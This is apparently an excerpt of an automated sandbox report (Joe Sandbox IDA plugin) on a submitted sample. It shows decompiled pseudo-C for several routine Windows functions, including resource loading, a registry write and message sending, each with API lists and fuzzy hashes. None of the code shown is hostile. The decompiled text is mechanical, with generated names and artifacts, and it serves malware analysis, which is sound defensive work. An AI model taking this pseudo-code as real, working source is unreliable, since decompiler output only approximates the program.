                                                      • CharNextA.USER32(?), ref: 0041196E
                                                        • Part of subcall function 004223D4: __ismbcspace_l.LIBCMT ref: 004223DA
                                                      • CharNextA.USER32(00000000), ref: 0041198B
                                                      • _strtol.LIBCMT ref: 004119B6
                                                      • _strtoul.LIBCMT ref: 004119BD
                                                        • Part of subcall function 00422215: strtoxl.LIBCMT ref: 00422235
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                      • String ID:
                                                      • API String ID: 4211061542-0
                                                      • Opcode ID: 4ad50f18f156165f88fae09250aadf94f50b5e3bb5c3d4eed2909c40359a7845
                                                      • Instruction ID: 8c4b41d3fbd90daf78a1bc0d05ccb98cb6085a6a9126d8b84ccc100fad1095ed
                                                      • Opcode Fuzzy Hash: 4ad50f18f156165f88fae09250aadf94f50b5e3bb5c3d4eed2909c40359a7845
                                                      • Instruction Fuzzy Hash: 8E2135B1610154ABCB20DB758C51BEA77E89F59354F10006BEBA0D3151DBBC8EC0CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E00416835(signed int _a4, signed int _a8, intOrPtr _a12) {
                                                      				void* _t15;
                                                      				signed int _t17;
                                                      				void* _t18;
                                                      				void* _t19;
                                                      				signed int _t23;
                                                      				signed int* _t31;
                                                      
                                                      				_t31 = _a8;
                                                      				if(_t31 == 0) {
                                                      					return _t15;
                                                      				}
                                                      				_t23 = _a4;
                                                      				if((_t23 & 0x00002000) == 0) {
                                                      					_t17 = (_t23 & 0x0000ffff) - 8;
                                                      					if(_t17 == 0) {
                                                      						__imp__#6( *_t31);
                                                      						L16:
                                                      						 *_t31 =  *_t31 & 0x00000000;
                                                      						L17:
                                                      						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
                                                      							__imp__CoTaskMemFree(_t31[1]);
                                                      						}
                                                      						return _t17;
                                                      					}
                                                      					_t18 = _t17 - 1;
                                                      					if(_t18 == 0) {
                                                      						L13:
                                                      						_t17 =  *_t31;
                                                      						if(_t17 == 0) {
                                                      							goto L17;
                                                      						}
                                                      						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
                                                      						goto L16;
                                                      					}
                                                      					_t17 = _t18 - 3;
                                                      					if(_t17 == 0) {
                                                      						__imp__#9(_t31);
                                                      						goto L17;
                                                      					}
                                                      					_t19 = _t17 - 1;
                                                      					if(_t19 == 0) {
                                                      						goto L13;
                                                      					} else {
                                                      						_t17 = _t19 - 0x7b;
                                                      						if(_t17 == 0) {
                                                      							E004167D2( &_a8, _a12);
                                                      							_t17 = _a8;
                                                      							if(_t17 != 0) {
                                                      								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
                                                      								_t17 = _a8;
                                                      								if(_t17 != 0) {
                                                      									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L17;
                                                      					}
                                                      				}
                                                      				_t17 =  *_t31;
                                                      				if(_t17 == 0) {
                                                      					goto L17;
                                                      				} else {
                                                      					__imp__#16(_t17);
                                                      					goto L16;
                                                      				}
                                                      			}










                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ArrayDestroyFreeSafeTask
                                                      • String ID:
                                                      • API String ID: 3253174383-0
                                                      • Opcode ID: ff2767bcfbf802d030f9915bf8789e482aa2cc33bf1bb96904a9821697865cec
                                                      • Instruction ID: 9c91db5bcdb4501a342168245182f2762e241240caaa57732c86d6e759acce40
                                                      • Opcode Fuzzy Hash: ff2767bcfbf802d030f9915bf8789e482aa2cc33bf1bb96904a9821697865cec
                                                      • Instruction Fuzzy Hash: 7B119A305012059BDF246F65D848BE77764FF00391B16442AF855D6250C739DD8ADB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E004153F4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				int _t44;
                                                      				signed int _t46;
                                                      				signed int _t55;
                                                      				void* _t60;
                                                      				intOrPtr* _t62;
                                                      				signed int _t63;
                                                      				void* _t64;
                                                      				void* _t65;
                                                      
                                                      				_t65 = __eflags;
                                                      				_push(0x30);
                                                      				E0041F6EA(E00432EB7, __ebx, __edi, __esi);
                                                      				_t55 = 0;
                                                      				 *((intOrPtr*)(_t64 - 0x18)) = 0;
                                                      				 *((intOrPtr*)(_t64 - 0x1c)) = 0x436aa8;
                                                      				_t62 =  *((intOrPtr*)(_t64 + 8));
                                                      				_t56 = _t64 - 0x14;
                                                      				 *(_t64 - 4) = 0;
                                                      				E0040DBE0(_t64 - 0x14, _t65,  *((intOrPtr*)(_t62 - 0xb0)));
                                                      				 *(_t64 - 4) = 1;
                                                      				if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
                                                      					_push( *((intOrPtr*)(_t64 + 0xc)));
                                                      					_t60 = E0040E8F5(0, _t56, __edi, _t62, __eflags);
                                                      					GetRgnBox( *(_t60 + 4), _t64 - 0x2c);
                                                      					IntersectRect(_t64 - 0x3c, _t64 - 0x2c, _t62 - 0x9c);
                                                      					_t44 = EqualRect(_t64 - 0x3c, _t64 - 0x2c);
                                                      					__eflags = _t44;
                                                      					_push( *((intOrPtr*)(_t64 + 0x10)));
                                                      					if(_t44 == 0) {
                                                      						L2:
                                                      						_t46 =  *((intOrPtr*)( *_t62 + 0x64))(_t62, _t55);
                                                      						 *(_t64 - 4) = _t55;
                                                      						_t63 = _t46;
                                                      						if( *(_t64 - 0x10) != _t55) {
                                                      							_push( *((intOrPtr*)(_t64 - 0x14)));
                                                      							_push(_t55);
                                                      							E0040D3B7();
                                                      						}
                                                      						_t55 = _t63;
                                                      						L5:
                                                      						 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
                                                      						 *((intOrPtr*)(_t64 - 0x1c)) = 0x4361d8;
                                                      						E0040E956(_t64 - 0x1c);
                                                      						return E0041F7C2(_t55);
                                                      					}
                                                      					_push(_t60);
                                                      					E00413FBC( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0xac)) + 0x20)));
                                                      					__eflags =  *(_t64 - 0x10);
                                                      					 *(_t64 - 4) = 0;
                                                      					if( *(_t64 - 0x10) != 0) {
                                                      						_push( *((intOrPtr*)(_t64 - 0x14)));
                                                      						_push(0);
                                                      						E0040D3B7();
                                                      					}
                                                      					goto L5;
                                                      				}
                                                      				_push( *((intOrPtr*)(_t64 + 0x10)));
                                                      				goto L2;
                                                      			}












                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Rect$EqualH_prolog3Intersect
                                                      • String ID:
                                                      • API String ID: 2161412305-0
                                                      • Opcode ID: 0b57ece63e3ceba4902fc7c2f66c781dd9ec10f0bed8fd36c999eebc1094b62d
                                                      • Instruction ID: 673062383659f9e1f0083c5338fa9c7e27454a49a707c8e2040369ae72bcd230
                                                      • Opcode Fuzzy Hash: 0b57ece63e3ceba4902fc7c2f66c781dd9ec10f0bed8fd36c999eebc1094b62d
                                                      • Instruction Fuzzy Hash: 42212772D00209EBCF11EFA5C9809EEBB78BF48314F00856AE515A3251D7789A45DB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 87%
                                                      			E00403115(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
                                                      				intOrPtr* _v0;
                                                      				void* _v4;
                                                      				signed int _v8;
                                                      				intOrPtr _v16;
                                                      				void* _t20;
                                                      				intOrPtr* _t23;
                                                      				void* _t29;
                                                      				void* _t31;
                                                      				intOrPtr _t35;
                                                      				char _t36;
                                                      				void* _t40;
                                                      				void* _t42;
                                                      				void* _t44;
                                                      
                                                      				_t44 = __eflags;
                                                      				_t38 = __esi;
                                                      				_t37 = __edi;
                                                      				_t31 = __ebx;
                                                      				_push(4);
                                                      				E0041F6EA(E00431B6F, __ebx, __edi, __esi);
                                                      				_t35 = E00402EE1(_t44, 0xc);
                                                      				_v16 = _t35;
                                                      				_t20 = 0;
                                                      				_v4 = 0;
                                                      				if(_t35 != 0) {
                                                      					_t20 = E004030C0(_t35);
                                                      				}
                                                      				_t36 = _a4;
                                                      				_v8 = _v8 | 0xffffffff;
                                                      				 *((intOrPtr*)(_t20 + 8)) = _t36;
                                                      				_a4 = _t20;
                                                      				E0041F7F4( &_a4, 0x43c3a8);
                                                      				asm("int3");
                                                      				_t40 = _t42;
                                                      				_t23 = _v0;
                                                      				_push(_t31);
                                                      				if(_t23 != 0) {
                                                      					 *_t23 = 0;
                                                      				}
                                                      				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
                                                      					E00402FE8(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
                                                      					LocalFree(_a12);
                                                      					_t29 = 1;
                                                      					__eflags = 1;
                                                      				} else {
                                                      					 *_a4 = 0;
                                                      					_t29 = 0;
                                                      				}
                                                      				return _t29;
                                                      			}

















                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 0040311C
                                                        • Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB
                                                      • __CxxThrowException@8.LIBCMT ref: 00403152
                                                      • FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,0043C3A8,00000004,0040105C,8007000E), ref: 0040317B
                                                        • Part of subcall function 00402FE8: _wctomb_s.LIBCMT ref: 00402FF8
                                                      • LocalFree.KERNEL32(?), ref: 004031A4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                      • String ID:
                                                      • API String ID: 1615547351-0
                                                      • Opcode ID: bcf99224840559c6eef959b414b5f999186a6ce74dcae3b75fd50ea2255e4a84
                                                      • Instruction ID: a0072123bbb8e88f97f6a2e598c50d444f9710c5a47a49e3e247eeb1caa48808
                                                      • Opcode Fuzzy Hash: bcf99224840559c6eef959b414b5f999186a6ce74dcae3b75fd50ea2255e4a84
                                                      • Instruction Fuzzy Hash: DE11C671604249AFDF00DFA4CC81DAE3BA9EB08354F10453AF925DA2E1D675DA51C758
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 90%
                                                      			E004060A2(void* __ecx) {
                                                      				void* _v8;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t23;
                                                      				void* _t28;
                                                      				void* _t30;
                                                      				struct HINSTANCE__* _t32;
                                                      				signed int _t34;
                                                      				signed short _t35;
                                                      				void* _t37;
                                                      				signed short* _t40;
                                                      
                                                      				_push(__ecx);
                                                      				_push(_t28);
                                                      				_t37 = __ecx;
                                                      				_t42 =  *((intOrPtr*)(__ecx + 0x58));
                                                      				_t40 =  *(__ecx + 0x60);
                                                      				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
                                                      				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
                                                      					_t32 =  *(E0040DB94(_t28, __ecx, _t40, _t42) + 0xc);
                                                      					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
                                                      				}
                                                      				if(_v8 != 0) {
                                                      					_t40 = LockResource(_v8);
                                                      				}
                                                      				_t30 = 1;
                                                      				if(_t40 != 0) {
                                                      					_t35 =  *_t40;
                                                      					if(_t40[1] != 0xffff) {
                                                      						_t23 = _t40[5] & 0x0000ffff;
                                                      						_t34 = _t40[6] & 0x0000ffff;
                                                      					} else {
                                                      						_t35 = _t40[6];
                                                      						_t23 = _t40[9] & 0x0000ffff;
                                                      						_t34 = _t40[0xa] & 0x0000ffff;
                                                      					}
                                                      					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
                                                      						_t30 = 0;
                                                      					}
                                                      				}
                                                      				if( *(_t37 + 0x58) != 0) {
                                                      					FreeResource(_v8);
                                                      				}
                                                      				return _t30;
                                                      			}

















                                                      APIs
                                                      • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004060C8
                                                      • LoadResource.KERNEL32(?,00000000), ref: 004060D0
                                                      • LockResource.KERNEL32(00000000), ref: 004060E2
                                                      • FreeResource.KERNEL32(00000000), ref: 0040612C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindFreeLoadLock
                                                      • String ID:
                                                      • API String ID: 1078018258-0
                                                      • Opcode ID: e99a868e6682d6fb6f2d9392ce75bffce52346b6c94286f6ba8a0afa17a2f0ef
                                                      • Instruction ID: 40659096538afe78b8a2922fa92c0b5113ad7cc5d91cea190e6c9c4304d24e44
                                                      • Opcode Fuzzy Hash: e99a868e6682d6fb6f2d9392ce75bffce52346b6c94286f6ba8a0afa17a2f0ef
                                                      • Instruction Fuzzy Hash: EE11BF30500712EBCB209FA5C848AABBBB4FF04355F11857AE84367691D378ED60D764
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E004044BD(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t37;
                                                      				intOrPtr _t43;
                                                      				void* _t45;
                                                      				intOrPtr* _t51;
                                                      				void* _t52;
                                                      				void* _t53;
                                                      
                                                      				_t53 = __eflags;
                                                      				_t46 = __ecx;
                                                      				_t44 = __ebx;
                                                      				_push(4);
                                                      				E0041F6EA(E00431C96, __ebx, __edi, __esi);
                                                      				_t51 = __ecx;
                                                      				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
                                                      				E00404F70(__ebx, __ecx, __edi, __ecx, _t53);
                                                      				_t54 =  *((intOrPtr*)(_t52 + 8));
                                                      				 *((intOrPtr*)(_t52 - 4)) = 0;
                                                      				 *_t51 = 0x435184;
                                                      				if( *((intOrPtr*)(_t52 + 8)) == 0) {
                                                      					 *((intOrPtr*)(_t51 + 0x50)) = 0;
                                                      				} else {
                                                      					_t43 = E0041FD45( *((intOrPtr*)(_t52 + 8)));
                                                      					_pop(_t46);
                                                      					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
                                                      				}
                                                      				_t45 = E0040DB94(_t44, 0, _t51, _t54);
                                                      				_t55 = _t45;
                                                      				if(_t45 == 0) {
                                                      					L4:
                                                      					E004037E3(_t45, _t46, 0, _t51, _t55);
                                                      				}
                                                      				_t7 = _t45 + 0x74; // 0x74
                                                      				_t46 = _t7;
                                                      				_t37 = E00404129(_t45, _t7, 0, _t51, _t55);
                                                      				if(_t37 == 0) {
                                                      					goto L4;
                                                      				}
                                                      				 *((intOrPtr*)(_t37 + 4)) = _t51;
                                                      				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
                                                      				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
                                                      				 *((intOrPtr*)(_t45 + 4)) = _t51;
                                                      				 *((intOrPtr*)(_t51 + 0x44)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x64)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x68)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x54)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x60)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x88)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x58)) = 0;
                                                      				 *((short*)(_t51 + 0x92)) = 0;
                                                      				 *((short*)(_t51 + 0x90)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x48)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x80)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x84)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x70)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x74)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x94)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
                                                      				return E0041F7C2(_t51);
                                                      			}









                                                      0x00404537
                                                      0x0040453a
                                                      0x00404540
                                                      0x00404543
                                                      0x0040454a
                                                      0x00404551
                                                      0x00404554
                                                      0x0040455a
                                                      0x00404560
                                                      0x00404566
                                                      0x00404569
                                                      0x0040456c
                                                      0x00404572
                                                      0x00404578
                                                      0x0040457b
                                                      0x0040457e
                                                      0x0040458f

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 004044C4
                                                        • Part of subcall function 00404F70: __EH_prolog3.LIBCMT ref: 00404F77
                                                      • __strdup.LIBCMT ref: 004044E6
                                                      • GetCurrentThread.KERNEL32 ref: 00404513
                                                      • GetCurrentThreadId.KERNEL32 ref: 0040451C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CurrentH_prolog3Thread$__strdup
                                                      • String ID:
                                                      • API String ID: 4206445780-0
                                                      • Opcode ID: f6c692d57fc520b1d6ef77885f23c6874392034aff60066bfb7f5f5535edbddf
                                                      • Instruction ID: 20f32028a5bae838525036816734f9698e3db64a09468b62decb6aeab759841c
                                                      • Opcode Fuzzy Hash: f6c692d57fc520b1d6ef77885f23c6874392034aff60066bfb7f5f5535edbddf
                                                      • Instruction Fuzzy Hash: 4521A4B0800B50CFC7219F2A854565AFBF4BFA4704F10892FD19A97B61DBB4A445DF08
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E0040672A(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
                                                      				signed int _v8;
                                                      				char _v24;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t13;
                                                      				CHAR* _t21;
                                                      				char* _t24;
                                                      				intOrPtr _t28;
                                                      				void* _t30;
                                                      				signed int _t31;
                                                      
                                                      				_t28 = __edx;
                                                      				_t13 =  *0x443590; // 0x8ffedb05
                                                      				_v8 = _t13 ^ _t31;
                                                      				_t24 = _a8;
                                                      				_t30 = __ecx;
                                                      				_t29 = _a4;
                                                      				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                                                      					E0041FC83( &_v24, 0x10, "%d", _a12);
                                                      					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
                                                      				} else {
                                                      					_t30 = E004066E4(__ecx, _t29);
                                                      					if(_t30 != 0) {
                                                      						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
                                                      						_t29 = _t21;
                                                      						RegCloseKey(_t30);
                                                      						_t18 = 0 | _t21 == 0x00000000;
                                                      					}
                                                      				}
                                                      				return E0041E5DF(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
                                                      			}

                                                      APIs
                                                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 00406763
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040676C
                                                      • _swprintf.LIBCMT ref: 00406789
                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040679A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                      • String ID:
                                                      • API String ID: 4210924919-0
                                                      • Opcode ID: e6f28c74d63e3e0f4c9bb6e8f8a4ffe9fc3b50b675efa29d1162e23e9e8736cd
                                                      • Instruction ID: 21f77df2bb305b21e633773eb41cbea4057ecc6761c3a3b171915aab709e64d7
                                                      • Opcode Fuzzy Hash: e6f28c74d63e3e0f4c9bb6e8f8a4ffe9fc3b50b675efa29d1162e23e9e8736cd
                                                      • Instruction Fuzzy Hash: F001C476500209BBDB109F658C85FAF73BCAF48708F41083ABA01E7181DA78E91587A8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E0040B87A(intOrPtr* __ecx) {
                                                      				char _v20;
                                                      				intOrPtr _v32;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				intOrPtr* __esi;
                                                      				struct HWND__* _t18;
                                                      				void* _t24;
                                                      				intOrPtr _t29;
                                                      				intOrPtr* _t33;
                                                      
                                                      				_t28 = __ecx;
                                                      				_push(0);
                                                      				_t33 = __ecx;
                                                      				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
                                                      					__eax =  *__esi;
                                                      					__ecx = __esi;
                                                      					__eax =  *((intOrPtr*)( *__esi + 0x170))();
                                                      				}
                                                      				_t30 = SendMessageA;
                                                      				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                      				E0040A5C3(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                      				_t28 = _t33;
                                                      				_t33 = E0040AF65(0, _t28, SendMessageA);
                                                      				if(_t33 != 0) {
                                                      					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                      					E0040A5C3(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                      					_t18 = GetCapture();
                                                      					if(_t18 != 0) {
                                                      						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
                                                      					}
                                                      					return _t18;
                                                      				} else {
                                                      					_push(_t28);
                                                      					_t2 =  &_v20; // 0x4423e8
                                                      					_v20 = 0x442480;
                                                      					E0041F7F4(_t2, 0x43c590);
                                                      					asm("int3");
                                                      					_push(4);
                                                      					E0041F6EA(E00431BFC, 0, SendMessageA, _t33);
                                                      					_t29 = E0040F014(0x104);
                                                      					_v32 = _t29;
                                                      					_t24 = 0;
                                                      					_v20 = 0;
                                                      					if(_t29 != 0) {
                                                      						_t24 = E0040D519(_t29);
                                                      					}
                                                      					return E0041F7C2(_t24);
                                                      				}
                                                      			}

                                                      APIs
                                                      • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 0040B8A4
                                                      • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 0040B8CF
                                                        • Part of subcall function 0040A5C3: GetTopWindow.USER32(00000000), ref: 0040A5D1
                                                      • GetCapture.USER32 ref: 0040B8E1
                                                      • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0040B8F0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CaptureWindow
                                                      • String ID:
                                                      • API String ID: 729421689-0
                                                      • Opcode ID: 6beb2dde5ff0e5b61ad0c8a51189c6d7a99162051fb35d5cd912703861ab2b7c
                                                      • Instruction ID: e49af4e3184ea6db717b127f1b3927963753d97c6b9026f51526ec4d1578ed3f
                                                      • Opcode Fuzzy Hash: 6beb2dde5ff0e5b61ad0c8a51189c6d7a99162051fb35d5cd912703861ab2b7c
                                                      • Instruction Fuzzy Hash: 360171B13503097FFA212B208CC9FBB76ADEB88748F010539F241BB1E2CAA55C005A69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E00406C31(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                      				void* _v8;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t18;
                                                      				struct HRSRC__* _t25;
                                                      				void* _t28;
                                                      				intOrPtr* _t34;
                                                      				void* _t36;
                                                      				intOrPtr _t37;
                                                      				struct HINSTANCE__* _t39;
                                                      
                                                      				_push(__ecx);
                                                      				_t28 = 0;
                                                      				_t40 = _a8;
                                                      				_push(_t36);
                                                      				_t34 = __ecx;
                                                      				_v8 = 0;
                                                      				if(_a8 == 0) {
                                                      					L4:
                                                      					_t37 = _a4;
                                                      					_a8 = 1;
                                                      					if(_t28 != 0) {
                                                      						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
                                                      						if(_v8 != 0) {
                                                      							FreeResource(_v8);
                                                      						}
                                                      					}
                                                      					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
                                                      						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
                                                      					}
                                                      					_t18 = _a8;
                                                      					L10:
                                                      					return _t18;
                                                      				}
                                                      				_t39 =  *(E0040DB94(0, __ecx, _t36, _t40) + 0xc);
                                                      				_t25 = FindResourceA(_t39, _a8, 0xf0);
                                                      				if(_t25 == 0) {
                                                      					goto L4;
                                                      				}
                                                      				_t18 = LoadResource(_t39, _t25);
